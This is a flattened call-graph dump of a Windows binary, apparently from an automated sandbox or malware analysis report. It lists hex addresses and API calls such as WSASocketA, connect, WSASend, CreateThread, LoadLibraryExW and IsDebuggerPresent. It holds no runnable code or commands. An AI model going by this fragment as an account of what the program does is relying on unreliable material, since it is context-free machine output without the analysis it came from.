18888->18886 18889 2601c55 RtlLeaveCriticalSection 18888->18889 18889->18739 18890 2601c22 18890->18889 18893 2610ac0 Mailbox 68 API calls 18892->18893 18894 2603c7e 18893->18894 20593 2603ca2 18894->20593 18900 2603d99 htons 18899->18900 18901 2603dcb htons 18899->18901 20620 2603bd3 18900->20620 20626 2603c16 18901->20626 18905 2603ded 18905->18739 18907 2608fbb __EH_prolog 18906->18907 20657 260373f 18907->20657 18909 2608fd5 RtlEnterCriticalSection 18911 2608fe4 RtlLeaveCriticalSection 18909->18911 18912 260901e 18911->18912 18912->18739 18914 2612f5c _malloc 59 API calls 18913->18914 18915 2605362 SHGetSpecialFolderPathA 18914->18915 18916 2605378 18915->18916 18916->18916 20666 2613721 18916->20666 18919 26053e2 18919->18739 18921 26053dc 20682 2613a34 18921->20682 18924 260513d 18923->18924 18925 2610ae9 18923->18925 18924->18751 18937 2613354 18925->18937 18928 2610ac0 Mailbox 68 API calls 18927->18928 18929 260a6ed 18928->18929 18930 260519d 18929->18930 19267 2602db5 18929->19267 18930->18757 18930->18760 18930->18761 18933 2610ac0 Mailbox 68 API calls 18932->18933 18935 260cea1 18933->18935 18934 260cfb0 18934->18757 18935->18934 19294 2602b95 18935->19294 18940 2613258 18937->18940 18939 261335f 18939->18924 18941 2613264 ___DllMainCRTStartup 18940->18941 18948 2618542 18941->18948 18947 261328b ___DllMainCRTStartup 18947->18939 18965 261889d 18948->18965 18950 261326d 18951 261329c RtlDecodePointer RtlDecodePointer 18950->18951 18952 26132c9 18951->18952 18953 2613279 18951->18953 18952->18953 19227 261910d 18952->19227 18962 2613296 18953->18962 18955 261332c RtlEncodePointer RtlEncodePointer 18955->18953 18956 2613300 18956->18953 18959 2618aab __realloc_crt 62 API calls 18956->18959 18960 261331a RtlEncodePointer 18956->18960 18957 26132db 18957->18955 18957->18956 19234 2618aab 18957->19234 18961 2613314 18959->18961 18960->18955 18961->18953 18961->18960 19263 261854b 18962->19263 18966 26188c1 RtlEnterCriticalSection 18965->18966 18967 26188ae 18965->18967 18966->18950 18972 2618925 18967->18972 18969 26188b4 18969->18966 18994 26183ef 18969->18994 18973 2618931 ___DllMainCRTStartup 18972->18973 18987 2618950 18973->18987 19001 2618683 18973->19001 18979 2618973 ___DllMainCRTStartup 18979->18969 18980 2618946 19045 26182cc 18980->19045 18981 261897d 18983 261889d __lock 59 API calls 18981->18983 18982 261896e 19053 2615e0b 18982->19053 18986 2618984 18983->18986 18988 2618991 18986->18988 18989 26189a9 18986->18989 18987->18979 19048 2618a64 18987->19048 19056 26191bc 18988->19056 19059 2612f24 18989->19059 18992 261899d 19065 26189c5 18992->19065 18995 2618683 __FF_MSGBANNER 59 API calls 18994->18995 18996 26183f7 18995->18996 18997 26186e0 __NMSG_WRITE 59 API calls 18996->18997 18998 26183ff 18997->18998 19198 261849e 18998->19198 19068 262012e 19001->19068 19003 261868a 19004 2618697 19003->19004 19005 262012e __FF_MSGBANNER 59 API calls 19003->19005 19006 26186e0 __NMSG_WRITE 59 API calls 19004->19006 19008 26186b9 19004->19008 19005->19004 19007 26186af 19006->19007 19009 26186e0 __NMSG_WRITE 59 API calls 19007->19009 19010 26186e0 19008->19010 19009->19008 19011 26186fe __NMSG_WRITE 19010->19011 19013 262012e __FF_MSGBANNER 55 API calls 19011->19013 19017 2618825 19011->19017 19015 2618711 19013->19015 19014 261888e 19014->18980 19016 261882a GetStdHandle 19015->19016 19018 262012e __FF_MSGBANNER 55 API calls 19015->19018 19016->19017 19021 2618838 _strlen 19016->19021 19130 26144fb 19017->19130 19019 2618722 19018->19019 19019->19016 19020 2618734 19019->19020 19020->19017 19078 261f4ed 19020->19078 19021->19017 19024 2618871 WriteFile 19021->19024 19024->19017 19025 2618761 GetModuleFileNameW 19027 2618781 19025->19027 19033 2618791 __NMSG_WRITE 19025->19033 19026 2618892 19137 2614eb5 IsProcessorFeaturePresent 19026->19137 19029 261f4ed __NMSG_WRITE 55 API calls 19027->19029 19029->19033 19031 26188c1 RtlEnterCriticalSection 19031->18980 19032 26187d7 19032->19026 19096 261f481 19032->19096 19033->19026 19033->19032 19087 261f562 19033->19087 19034 2618925 __mtinitlocknum 55 API calls 19037 26188b4 19034->19037 19037->19031 19040 26183ef __amsg_exit 55 API calls 19037->19040 19039 261f481 __NMSG_WRITE 55 API calls 19041 261880e 19039->19041 19042 26188c0 19040->19042 19041->19026 19043 2618815 19041->19043 19042->19031 19105 262016e RtlEncodePointer 19043->19105 19157 2618298 GetModuleHandleExW 19045->19157 19050 2618a72 19048->19050 19049 2612f5c _malloc 59 API calls 19049->19050 19050->19049 19051 2618967 19050->19051 19160 26194b5 Sleep 19050->19160 19051->18981 19051->18982 19161 2615c22 GetLastError 19053->19161 19055 2615e10 19055->18979 19057 26191d9 InitializeCriticalSectionAndSpinCount 19056->19057 19058 26191cc 19056->19058 19057->18992 19058->18992 19060 2612f56 _free 19059->19060 19061 2612f2d HeapFree 19059->19061 19060->18992 19061->19060 19062 2612f42 19061->19062 19063 2615e0b __fptostr 57 API calls 19062->19063 19064 2612f48 GetLastError 19063->19064 19064->19060 19197 2618a07 RtlLeaveCriticalSection 19065->19197 19067 26189cc 19067->18979 19069 2620138 19068->19069 19070 2620142 19069->19070 19071 2615e0b __fptostr 59 API calls 19069->19071 19070->19003 19072 262015e 19071->19072 19075 2614ea5 19072->19075 19076 2614e7a __fptostr 9 API calls 19075->19076 19077 2614eb1 19076->19077 19077->19003 19079 261f4f8 19078->19079 19080 261f506 19078->19080 19079->19080 19084 261f51f 19079->19084 19081 2615e0b __fptostr 59 API calls 19080->19081 19082 261f510 19081->19082 19083 2614ea5 __fptostr 9 API calls 19082->19083 19085 2618754 19083->19085 19084->19085 19086 2615e0b __fptostr 59 API calls 19084->19086 19085->19025 19085->19026 19086->19082 19091 261f570 19087->19091 19088 261f574 19089 2615e0b __fptostr 59 API calls 19088->19089 19090 261f579 19088->19090 19092 261f5a4 19089->19092 19090->19032 19091->19088 19091->19090 19094 261f5b3 19091->19094 19093 2614ea5 __fptostr 9 API calls 19092->19093 19093->19090 19094->19090 19095 2615e0b __fptostr 59 API calls 19094->19095 19095->19092 19097 261f49b 19096->19097 19099 261f48d 19096->19099 19098 2615e0b __fptostr 59 API calls 19097->19098 19104 261f4a5 19097->19104 19098->19104 19099->19097 19102 261f4c7 19099->19102 19100 2614ea5 __fptostr 9 API calls 19101 26187f7 19100->19101 19101->19026 19101->19039 19102->19101 19103 2615e0b __fptostr 59 API calls 19102->19103 19103->19104 19104->19100 19106 26201a2 ___crtIsPackagedApp 19105->19106 19107 2620261 IsDebuggerPresent 19106->19107 19108 26201b1 LoadLibraryExW 19106->19108 19109 2620286 19107->19109 19110 262026b 19107->19110 19111 26201c8 GetLastError 19108->19111 19112 26201ee GetProcAddress 19108->19112 19114 2620279 19109->19114 19115 262028b RtlDecodePointer 19109->19115 19113 2620272 OutputDebugStringW 19110->19113 19110->19114 19116 26201d7 LoadLibraryExW 19111->19116 19118 262027e 19111->19118 19117 2620202 7 API calls 19112->19117 19112->19118 19113->19114 19114->19118 19119 26202ca 19114->19119 19124 26202b2 RtlDecodePointer RtlDecodePointer 19114->19124 19115->19118 19116->19112 19116->19118 19120 262024a GetProcAddress RtlEncodePointer 19117->19120 19121 262025e 19117->19121 19122 26144fb __crtLCMapStringA_stat 6 API calls 19118->19122 19123 2620302 RtlDecodePointer 19119->19123 19129 26202ee RtlDecodePointer 19119->19129 19120->19121 19121->19107 19126 2620350 19122->19126 19127 2620309 19123->19127 19123->19129 19124->19119 19126->19017 19127->19129 19129->19118 19131 2614503 19130->19131 19132 2614505 IsProcessorFeaturePresent 19130->19132 19131->19014 19134 261953f 19132->19134 19143 26194ee IsDebuggerPresent 19134->19143 19138 2614ec0 19137->19138 19149 2614d48 19138->19149 19142 2614edb 19142->19031 19142->19034 19144 2619503 __call_reportfault 19143->19144 19145 26194d8 __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 19144->19145 19147 261950b __call_reportfault 19145->19147 19146 26194c3 ___raise_securityfailure GetCurrentProcess TerminateProcess 19148 2619528 19146->19148 19147->19146 19148->19014 19150 2614d62 _memset __call_reportfault 19149->19150 19151 2614d82 IsDebuggerPresent 19150->19151 19152 26194d8 __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 19151->19152 19155 2614e46 __call_reportfault 19152->19155 19153 26144fb __crtLCMapStringA_stat 6 API calls 19154 2614e69 19153->19154 19156 26194c3 GetCurrentProcess TerminateProcess 19154->19156 19155->19153 19156->19142 19158 26182b1 GetProcAddress 19157->19158 19159 26182c3 ExitProcess 19157->19159 19158->19159 19160->19050 19175 261917b 19161->19175 19163 2615c37 19164 2615c85 SetLastError 19163->19164 19178 2618a1c 19163->19178 19164->19055 19168 2615c5e 19169 2615c64 19168->19169 19170 2615c7c 19168->19170 19187 2615c91 19169->19187 19172 2612f24 _free 56 API calls 19170->19172 19173 2615c82 19172->19173 19173->19164 19174 2615c6c GetCurrentThreadId 19174->19164 19176 2619192 TlsGetValue 19175->19176 19177 261918e 19175->19177 19176->19163 19177->19163 19180 2618a23 19178->19180 19179 2620468 __calloc_impl 59 API calls 19179->19180 19180->19179 19181 2615c4a 19180->19181 19182 2618a41 19180->19182 19181->19164 19184 261919a 19181->19184 19182->19180 19182->19181 19183 26194b5 __malloc_crt Sleep 19182->19183 19183->19182 19185 26191b0 19184->19185 19186 26191b4 TlsSetValue 19184->19186 19185->19168 19186->19168 19188 2615c9d ___DllMainCRTStartup 19187->19188 19189 261889d __lock 59 API calls 19188->19189 19190 2615cda 19189->19190 19191 2615d32 __initptd RtlLeaveCriticalSection 19190->19191 19192 2615cf4 19191->19192 19193 261889d __lock 59 API calls 19192->19193 19194 2615cfb ___addlocaleref 19193->19194 19195 2615d3b __initptd RtlLeaveCriticalSection 19194->19195 19196 2615d26 ___DllMainCRTStartup 19195->19196 19196->19174 19197->19067 19201 2618554 19198->19201 19200 261840a 19202 2618560 ___DllMainCRTStartup 19201->19202 19203 261889d __lock 52 API calls 19202->19203 19204 2618567 19203->19204 19205 2618595 RtlDecodePointer 19204->19205 19207 2618620 _doexit 19204->19207 19205->19207 19208 26185ac RtlDecodePointer 19205->19208 19221 261866e 19207->19221 19214 26185bc 19208->19214 19210 261867d ___DllMainCRTStartup 19210->19200 19212 26185c9 RtlEncodePointer 19212->19214 19213 2618665 19215 261866e 19213->19215 19216 26182cc __mtinitlocknum 3 API calls 19213->19216 19214->19207 19214->19212 19218 26185d9 RtlDecodePointer RtlEncodePointer 19214->19218 19217 261867b 19215->19217 19226 2618a07 RtlLeaveCriticalSection 19215->19226 19216->19215 19217->19200 19220 26185eb RtlDecodePointer RtlDecodePointer 19218->19220 19220->19214 19222 2618674 19221->19222 19223 261864e 19221->19223 19224 2618a07 _doexit RtlLeaveCriticalSection 19222->19224 19223->19210 19225 2618a07 RtlLeaveCriticalSection 19223->19225 19224->19223 19225->19213 19226->19217 19228 2619116 19227->19228 19229 261912b RtlSizeHeap 19227->19229 19230 2615e0b __fptostr 59 API calls 19228->19230 19229->18957 19231 261911b 19230->19231 19232 2614ea5 __fptostr 9 API calls 19231->19232 19233 2619126 19232->19233 19233->18957 19237 2618ab2 19234->19237 19236 2618aef 19236->18956 19237->19236 19239 2620354 19237->19239 19260 26194b5 Sleep 19237->19260 19240 2620368 19239->19240 19241 262035d 19239->19241 19243 2620370 19240->19243 19251 262037d 19240->19251 19242 2612f5c _malloc 59 API calls 19241->19242 19244 2620365 19242->19244 19245 2612f24 _free 59 API calls 19243->19245 19244->19237 19259 2620378 _free 19245->19259 19246 26203b5 19247 26181b3 _malloc RtlDecodePointer 19246->19247 19249 26203bb 19247->19249 19248 2620385 RtlReAllocateHeap 19248->19251 19248->19259 19252 2615e0b __fptostr 59 API calls 19249->19252 19250 26203e5 19254 2615e0b __fptostr 59 API calls 19250->19254 19251->19246 19251->19248 19251->19250 19256 26203cd 19251->19256 19261 26181b3 RtlDecodePointer 19251->19261 19252->19259 19255 26203ea GetLastError 19254->19255 19255->19259 19257 2615e0b __fptostr 59 API calls 19256->19257 19258 26203d2 GetLastError 19257->19258 19258->19259 19259->19237 19260->19237 19262 26181c6 19261->19262 19262->19251 19266 2618a07 RtlLeaveCriticalSection 19263->19266 19265 261329b 19265->18947 19266->19265 19268 2602de4 19267->19268 19269 2602dca 19267->19269 19271 2602dfc 19268->19271 19272 2602def 19268->19272 19270 2610ac0 Mailbox 68 API calls 19269->19270 19280 2602dcf 19270->19280 19281 2602d39 WSASetLastError WSASend 19271->19281 19274 2610ac0 Mailbox 68 API calls 19272->19274 19274->19280 19275 2602e54 WSASetLastError select 19291 260a4b7 19275->19291 19276 2610ac0 68 API calls Mailbox 19278 2602e0c 19276->19278 19278->19275 19278->19276 19279 2602d39 71 API calls 19278->19279 19278->19280 19279->19278 19280->18929 19282 260a4b7 69 API calls 19281->19282 19283 2602d6e 19282->19283 19284 2602d82 19283->19284 19285 2602d75 19283->19285 19287 2610ac0 Mailbox 68 API calls 19284->19287 19289 2602d7a 19284->19289 19286 2610ac0 Mailbox 68 API calls 19285->19286 19286->19289 19287->19289 19288 2610ac0 Mailbox 68 API calls 19290 2602d9c 19288->19290 19289->19288 19289->19290 19290->19278 19292 2610ac0 Mailbox 68 API calls 19291->19292 19293 260a4c3 WSAGetLastError 19292->19293 19293->19278 19295 2602bb1 19294->19295 19296 2602bc7 19294->19296 19297 2610ac0 Mailbox 68 API calls 19295->19297 19298 2602bd2 19296->19298 19308 2602bdf 19296->19308 19302 2602bb6 19297->19302 19300 2610ac0 Mailbox 68 API calls 19298->19300 19299 2602be2 WSASetLastError WSARecv 19301 260a4b7 69 API calls 19299->19301 19300->19302 19301->19308 19302->18935 19303 2610ac0 68 API calls Mailbox 19303->19308 19304 2602d22 19309 2601996 19304->19309 19306 2602cbc WSASetLastError select 19307 260a4b7 69 API calls 19306->19307 19307->19308 19308->19299 19308->19302 19308->19303 19308->19304 19308->19306 19310 26019bb 19309->19310 19311 260199f 19309->19311 19310->19302 19312 2613354 __cinit 68 API calls 19311->19312 19312->19310 19335 260e22e 19313->19335 19315 260d0ae 19315->18779 19419 2613369 19316->19419 19318 26120c4 19318->18781 19320 26120ed ResumeThread 19320->18781 19321 26120e6 CloseHandle 19321->19320 19323 2610ac0 Mailbox 68 API calls 19322->19323 19324 2603fb8 19323->19324 20037 2601815 19324->20037 19327 260a639 19328 260a643 __EH_prolog 19327->19328 20043 260cbf1 19328->20043 19333 261450a __CxxThrowException@8 RaiseException 19336 260e238 __EH_prolog 19335->19336 19341 2604030 19336->19341 19340 260e266 19340->19315 19353 26253a0 19341->19353 19343 260403a GetProcessHeap RtlAllocateHeap 19344 2604053 std::exception::exception 19343->19344 19345 260407c 19343->19345 19354 260a678 19344->19354 19345->19340 19347 260408a 19345->19347 19348 2604094 __EH_prolog 19347->19348 19401 260a297 19348->19401 19353->19343 19355 260a682 __EH_prolog 19354->19355 19362 260cc27 19355->19362 19361 260a6b0 19371 260d787 19362->19371 19365 260cc41 19393 260d7bf 19365->19393 19367 260a69f 19368 261450a 19367->19368 19370 2614529 RaiseException 19368->19370 19370->19361 19374 26124c3 19371->19374 19377 26124f1 19374->19377 19378 260a691 19377->19378 19379 26124ff 19377->19379 19378->19365 19383 2612587 19379->19383 19384 2612590 19383->19384 19385 2612504 19383->19385 19386 2612f24 _free 59 API calls 19384->19386 19385->19378 19387 2612549 19385->19387 19386->19385 19388 261257a 19387->19388 19389 2612555 _strlen 19387->19389 19388->19378 19390 2612f5c _malloc 59 API calls 19389->19390 19391 2612567 19390->19391 19391->19388 19392 2616c6c __fltout2 59 API calls 19391->19392 19392->19388 19394 260d7c9 __EH_prolog 19393->19394 19397 260b6ea 19394->19397 19396 260d800 Mailbox 19396->19367 19398 260b6f4 __EH_prolog 19397->19398 19399 26124c3 std::exception::exception 59 API calls 19398->19399 19400 260b705 Mailbox 19399->19400 19400->19396 19412 260b0ae 19401->19412 19403 26040c1 19404 2603fdc 19403->19404 19418 26253a0 19404->19418 19406 2603fe6 CreateEventA 19407 2603ffd 19406->19407 19408 260400f 19406->19408 19409 2603fb0 Mailbox 68 API calls 19407->19409 19408->19340 19410 2604005 19409->19410 19411 260a639 Mailbox 60 API calls 19410->19411 19411->19408 19413 260b0ba 19412->19413 19415 260b0ca std::exception::exception 19412->19415 19414 2613afc _Allocate 60 API calls 19413->19414 19413->19415 19414->19415 19415->19403 19416 261450a __CxxThrowException@8 RaiseException 19415->19416 19417 260fadf 19416->19417 19418->19406 19420 2613377 19419->19420 19421 261338b 19419->19421 19422 2615e0b __fptostr 59 API calls 19420->19422 19423 2618a1c __calloc_crt 59 API calls 19421->19423 19424 261337c 19422->19424 19425 2613398 19423->19425 19426 2614ea5 __fptostr 9 API calls 19424->19426 19427 26133e9 19425->19427 19438 2615c0a 19425->19438 19432 26120bb 19426->19432 19428 2612f24 _free 59 API calls 19427->19428 19430 26133ef 19428->19430 19430->19432 19443 2615dea 19430->19443 19432->19318 19432->19320 19432->19321 19433 2615c91 __initptd 59 API calls 19435 26133ae CreateThread 19433->19435 19435->19432 19437 26133e1 GetLastError 19435->19437 19451 26134c9 19435->19451 19437->19427 19439 2615c22 __getptd_noexit 59 API calls 19438->19439 19440 2615c10 19439->19440 19441 26133a5 19440->19441 19442 26183ef __amsg_exit 59 API calls 19440->19442 19441->19433 19442->19441 19448 2615dd7 19443->19448 19445 2615df3 _free 19446 2615e0b __fptostr 59 API calls 19445->19446 19447 2615e06 19446->19447 19447->19432 19449 2615c22 __getptd_noexit 59 API calls 19448->19449 19450 2615ddc 19449->19450 19450->19445 19452 26134d2 __threadstartex@4 19451->19452 19453 261917b __getptd_noexit TlsGetValue 19452->19453 19454 26134d8 19453->19454 19455 261350b 19454->19455 19456 26134df __threadstartex@4 19454->19456 19483 2615a9f 19455->19483 19458 261919a __getptd_noexit TlsSetValue 19456->19458 19459 26134ee 19458->19459 19460 2613501 GetCurrentThreadId 19459->19460 19461 26134f4 GetLastError RtlExitUserThread 19459->19461 19463 2613526 ___crtIsPackagedApp 19460->19463 19461->19460 19462 261353a 19473 2613402 19462->19473 19463->19462 19467 2613471 19463->19467 19468 26134b3 RtlDecodePointer 19467->19468 19469 261347a LoadLibraryExW GetProcAddress 19467->19469 19472 26134c3 19468->19472 19470 261349d RtlEncodePointer 19469->19470 19471 261349c 19469->19471 19470->19468 19471->19462 19472->19462 19474 261340e ___DllMainCRTStartup 19473->19474 19475 2615c0a __beginthreadex 59 API calls 19474->19475 19476 2613413 19475->19476 19515 2612110 19476->19515 19484 2615aab ___DllMainCRTStartup 19483->19484 19485 2615ac4 19484->19485 19486 2615bb3 ___DllMainCRTStartup 19484->19486 19487 2612f24 _free 59 API calls 19484->19487 19488 2615ad3 19485->19488 19489 2612f24 _free 59 API calls 19485->19489 19486->19463 19487->19485 19490 2615ae2 19488->19490 19491 2612f24 _free 59 API calls 19488->19491 19489->19488 19492 2615af1 19490->19492 19494 2612f24 _free 59 API calls 19490->19494 19491->19490 19493 2615b00 19492->19493 19495 2612f24 _free 59 API calls 19492->19495 19496 2615b0f 19493->19496 19497 2612f24 _free 59 API calls 19493->19497 19494->19492 19495->19493 19498 2615b1e 19496->19498 19499 2612f24 _free 59 API calls 19496->19499 19497->19496 19500 2615b30 19498->19500 19502 2612f24 _free 59 API calls 19498->19502 19499->19498 19501 261889d __lock 59 API calls 19500->19501 19505 2615b38 19501->19505 19502->19500 19503 2615b5b 19783 2615bbf 19503->19783 19505->19503 19507 2612f24 _free 59 API calls 19505->19507 19507->19503 19508 261889d __lock 59 API calls 19513 2615b6f ___removelocaleref 19508->19513 19509 2615ba0 19816 2615bcb 19509->19816 19513->19509 19786 2614f75 19513->19786 19533 26115c0 19515->19533 19518 2612160 19555 260dd62 19518->19555 19519 2612158 TlsSetValue 19519->19518 19536 2611624 19533->19536 19534 26116a0 19535 26116b6 19534->19535 19538 26116b3 CloseHandle 19534->19538 19540 26144fb __crtLCMapStringA_stat 6 API calls 19535->19540 19536->19534 19537 261163c 19536->19537 19542 261174c WaitForSingleObject 19536->19542 19548 2611720 CreateEventA 19536->19548 19552 2611bc0 GetCurrentProcessId 19536->19552 19554 261173e CloseHandle 19536->19554 19539 261167e ResetEvent 19537->19539 19543 2611655 OpenEventA 19537->19543 19571 2611bc0 19537->19571 19538->19535 19541 2611685 19539->19541 19544 26116ce 19540->19544 19575 2611800 19541->19575 19542->19536 19546 2611677 19543->19546 19547 261166f 19543->19547 19544->19518 19544->19519 19546->19539 19546->19541 19547->19546 19550 2611674 CloseHandle 19547->19550 19548->19536 19549 2611652 19549->19543 19550->19546 19552->19536 19554->19536 19556 260dd84 19555->19556 19586 2604d86 19556->19586 19585 2610c20 19571->19585 19573 2611c12 GetCurrentProcessId 19574 2611c25 19573->19574 19574->19549 19577 261180f 19575->19577 19576 2611867 19578 2611873 SetEvent 19576->19578 19579 261169d 19576->19579 19577->19576 19580 2611845 CreateEventA 19577->19580 19581 2611bc0 GetCurrentProcessId 19577->19581 19578->19579 19579->19534 19580->19576 19582 261185b 19580->19582 19583 2611842 19581->19583 19582->19576 19583->19580 19585->19573 19819 2618a07 RtlLeaveCriticalSection 19783->19819 19785 2615b68 19785->19508 19787 2614fee 19786->19787 19790 2614f8a 19786->19790 19790->19787 19819->19785 20040 2612483 20037->20040 20041 2612549 std::exception::_Copy_str 59 API calls 20040->20041 20042 260182a 20041->20042 20042->19327 20049 260d6b8 20043->20049 20046 260cc0b 20058 260d6f0 20046->20058 20048 260a666 20048->19333 20052 260b1dc 20049->20052 20053 260b1e6 __EH_prolog 20052->20053 20054 26124c3 std::exception::exception 59 API calls 20053->20054 20055 260b1f7 20054->20055 20056 2607cac std::bad_exception::bad_exception 60 API calls 20055->20056 20057 260a658 20056->20057 20057->20046 20059 260d6fa __EH_prolog 20058->20059 20062 260b5d4 20059->20062 20061 260d731 Mailbox 20061->20048 20063 260b5de __EH_prolog 20062->20063 20064 260b1dc std::bad_exception::bad_exception 60 API calls 20063->20064 20065 260b5ef Mailbox 20064->20065 20065->20061 20087 260353e 20066->20087 20070 2602ae8 WSASetLastError connect 20069->20070 20071 2602ad8 20069->20071 20072 260a4b7 69 API calls 20070->20072 20073 2610ac0 Mailbox 68 API calls 20071->20073 20074 2602b07 20072->20074 20075 2602add 20073->20075 20074->20075 20076 2610ac0 Mailbox 68 API calls 20074->20076 20077 2610ac0 Mailbox 68 API calls 20075->20077 20076->20075 20078 2602b1b 20077->20078 20080 2610ac0 Mailbox 68 API calls 20078->20080 20083 2602b38 20078->20083 20080->20083 20082 2602b87 20082->18794 20083->20082 20147 2603027 20083->20147 20086 2610ac0 Mailbox 68 API calls 20086->20082 20088 2603548 __EH_prolog 20087->20088 20089 2603576 20088->20089 20090 2603557 20088->20090 20109 2602edd WSASetLastError WSASocketA 20089->20109 20091 2601996 68 API calls 20090->20091 20095 260355f 20091->20095 20094 26035ad CreateIoCompletionPort 20096 26035c5 GetLastError 20094->20096 20097 26035db 20094->20097 20095->18791 20099 2610ac0 Mailbox 68 API calls 20096->20099 20098 2610ac0 Mailbox 68 API calls 20097->20098 20100 26035d2 20098->20100 20099->20100 20101 2603626 20100->20101 20102 26035ef 20100->20102 20135 260dea1 20101->20135 20103 2610ac0 Mailbox 68 API calls 20102->20103 20104 2603608 20103->20104 20117 26029ee 20104->20117 20107 2603659 20108 2610ac0 Mailbox 68 API calls 20107->20108 20108->20095 20110 2610ac0 Mailbox 68 API calls 20109->20110 20111 2602f0a WSAGetLastError 20110->20111 20112 2602f21 20111->20112 20116 2602f41 20111->20116 20113 2602f27 setsockopt 20112->20113 20114 2602f3c 20112->20114 20113->20114 20115 2610ac0 Mailbox 68 API calls 20114->20115 20115->20116 20116->20094 20116->20095 20118 2602aad 20117->20118 20119 2602a0c 20117->20119 20120 2610ac0 Mailbox 68 API calls 20118->20120 20122 2602ab8 20118->20122 20121 2602a39 WSASetLastError closesocket 20119->20121 20125 2610ac0 Mailbox 68 API calls 20119->20125 20120->20122 20123 260a4b7 69 API calls 20121->20123 20122->20095 20124 2602a51 20123->20124 20124->20118 20127 2610ac0 Mailbox 68 API calls 20124->20127 20126 2602a21 20125->20126 20139 2602f50 20126->20139 20130 2602a5c 20127->20130 20131 2602a7b ioctlsocket WSASetLastError closesocket 20130->20131 20132 2610ac0 Mailbox 68 API calls 20130->20132 20134 260a4b7 69 API calls 20131->20134 20133 2602a6e 20132->20133 20133->20118 20133->20131 20134->20118 20136 260deab __EH_prolog 20135->20136 20137 2613afc _Allocate 60 API calls 20136->20137 20138 260debf 20137->20138 20138->20107 20140 2602f70 WSASetLastError setsockopt 20139->20140 20141 2602f5b 20139->20141 20143 260a4b7 69 API calls 20140->20143 20142 2610ac0 Mailbox 68 API calls 20141->20142 20146 2602a36 20142->20146 20144 2602f9e 20143->20144 20145 2610ac0 Mailbox 68 API calls 20144->20145 20144->20146 20145->20146 20146->20121 20148 260303b 20147->20148 20149 260304d WSASetLastError select 20147->20149 20151 2610ac0 Mailbox 68 API calls 20148->20151 20150 260a4b7 69 API calls 20149->20150 20152 2603095 20150->20152 20154 2602b59 20151->20154 20153 2610ac0 Mailbox 68 API calls 20152->20153 20152->20154 20153->20154 20154->20082 20155 2602fb4 20154->20155 20156 2602fc0 20155->20156 20157 2602fd5 WSASetLastError getsockopt 20155->20157 20158 2610ac0 Mailbox 68 API calls 20156->20158 20159 260a4b7 69 API calls 20157->20159 20162 2602b7a 20158->20162 20160 260300f 20159->20160 20161 2610ac0 Mailbox 68 API calls 20160->20161 20160->20162 20161->20162 20162->20082 20162->20086 20170 26253a0 20163->20170 20165 26032b5 RtlEnterCriticalSection 20166 2610ac0 Mailbox 68 API calls 20165->20166 20167 26032d6 20166->20167 20171 2603307 20167->20171 20170->20165 20173 2603311 __EH_prolog 20171->20173 20174 2603350 20173->20174 20183 2607e30 20173->20183 20187 260239d 20174->20187 20178 2610ac0 Mailbox 68 API calls 20180 260337c 20178->20180 20181 2602d39 71 API calls 20180->20181 20182 2603390 20181->20182 20193 2607dd9 20182->20193 20186 2607e3e 20183->20186 20184 2607eb4 20184->20173 20186->20184 20197 2608995 20186->20197 20191 26023ab 20187->20191 20188 2602417 20188->20178 20188->20182 20189 26023c1 PostQueuedCompletionStatus 20190 26023da RtlEnterCriticalSection 20189->20190 20189->20191 20190->20191 20191->20188 20191->20189 20192 26023f8 InterlockedExchange RtlLeaveCriticalSection 20191->20192 20192->20191 20195 2607dde 20193->20195 20194 26032ee RtlLeaveCriticalSection 20194->18809 20195->20194 20213 2601e7f 20195->20213 20198 26089bf 20197->20198 20199 2607dd9 68 API calls 20198->20199 20200 2608a05 20199->20200 20201 2608a2c 20200->20201 20203 260a222 20200->20203 20201->20184 20204 260a23c 20203->20204 20205 260a22c 20203->20205 20204->20201 20205->20204 20208 260fae0 20205->20208 20209 2612483 std::exception::exception 59 API calls 20208->20209 20210 260faf8 20209->20210 20211 261450a __CxxThrowException@8 RaiseException 20210->20211 20212 260fb0d 20211->20212 20214 2610ac0 Mailbox 68 API calls 20213->20214 20215 2601e90 20214->20215 20215->20195 20226 261222b 20216->20226 20219 2612355 20220 2615e0b __fptostr 59 API calls 20219->20220 20221 261235a 20220->20221 20222 2614ea5 __fptostr 9 API calls 20221->20222 20224 2612365 ___ascii_stricmp 20222->20224 20223 261592a 66 API calls __tolower_l 20225 261236c 20223->20225 20224->18820 20225->20223 20225->20224 20227 261223c 20226->20227 20233 2612289 20226->20233 20228 2615c0a __beginthreadex 59 API calls 20227->20228 20229 2612242 20228->20229 20230 2612269 20229->20230 20234 261516f 20229->20234 20230->20233 20249 26154f1 20230->20249 20233->20219 20233->20225 20235 261517b ___DllMainCRTStartup 20234->20235 20236 2615c0a __beginthreadex 59 API calls 20235->20236 20237 2615184 20236->20237 20238 26151b3 20237->20238 20240 2615197 20237->20240 20239 261889d __lock 59 API calls 20238->20239 20241 26151ba 20239->20241 20242 2615c0a __beginthreadex 59 API calls 20240->20242 20261 26151ef 20241->20261 20243 261519c 20242->20243 20246 26151aa ___DllMainCRTStartup 20243->20246 20248 26183ef __amsg_exit 59 API calls 20243->20248 20246->20230 20248->20246 20250 26154fd ___DllMainCRTStartup 20249->20250 20251 2615c0a __beginthreadex 59 API calls 20250->20251 20252 2615507 20251->20252 20253 261889d __lock 59 API calls 20252->20253 20257 2615519 20252->20257 20254 2615537 20253->20254 20259 2612f24 _free 59 API calls 20254->20259 20260 2615564 20254->20260 20256 26183ef __amsg_exit 59 API calls 20258 2615527 ___DllMainCRTStartup 20256->20258 20257->20256 20257->20258 20258->20233 20259->20260 20269 261558e 20260->20269 20262 26151fa ___addlocaleref ___removelocaleref 20261->20262 20264 26151ce 20261->20264 20263 2614f75 ___freetlocinfo 59 API calls 20262->20263 20262->20264 20263->20264 20265 26151e6 20264->20265 20268 2618a07 RtlLeaveCriticalSection 20265->20268 20267 26151ed 20267->20243 20268->20267 20272 2618a07 RtlLeaveCriticalSection 20269->20272 20271 2615595 20271->20257 20272->20271 20274 261283b 20273->20274 20275 2615e0b __fptostr 59 API calls 20274->20275 20276 261284b _strlen 20274->20276 20277 2612840 20275->20277 20276->18844 20278 2614ea5 __fptostr 9 API calls 20277->20278 20278->20276 20280 260dfb8 __EH_prolog 20279->20280 20281 2613afc _Allocate 60 API calls 20280->20281 20282 260dfcf 20281->20282 20282->18863 20284 260a6c0 GetProcessHeap HeapFree 20283->20284 20284->18870 20286 261222b _LocaleUpdate::_LocaleUpdate 59 API calls 20285->20286 20287 2616075 20286->20287 20288 2615e0b __fptostr 59 API calls 20287->20288 20289 261607a 20288->20289 20290 2616b4b 20289->20290 20307 261609a __output_l 